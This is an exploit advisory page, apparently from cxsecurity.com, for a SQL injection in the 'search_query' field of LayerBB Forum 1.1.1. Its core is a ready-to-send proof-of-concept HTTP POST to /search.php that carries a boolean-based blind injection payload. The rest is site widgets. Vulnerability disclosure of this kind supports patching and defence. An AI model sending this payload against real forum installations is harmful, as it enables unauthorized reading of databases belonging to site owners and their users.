LayerBB Forum 1.1.1 search_query SQL Injection

2018.10.04
Credit: Ihsan Sencan
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: LayerBB Forum 1.1.1 - 'search_query' SQL Injection # Exploit Author: Ihsan Sencan # Dork: N/A # Date: 2018-10-04 # Vendor Homepage: https://layerbb.com/ # Software Link: https://demo.layerbb.com/ # Version: 1.1.1 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # POC: # 1) # POST /search.php HTTP/1.1 # Host: Target search_query=S' RLIKE (SELECT (CASE WHEN (111=111) THEN 0x73 ELSE 0x28 END)) AND 'X'='X&search_submit=Search


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top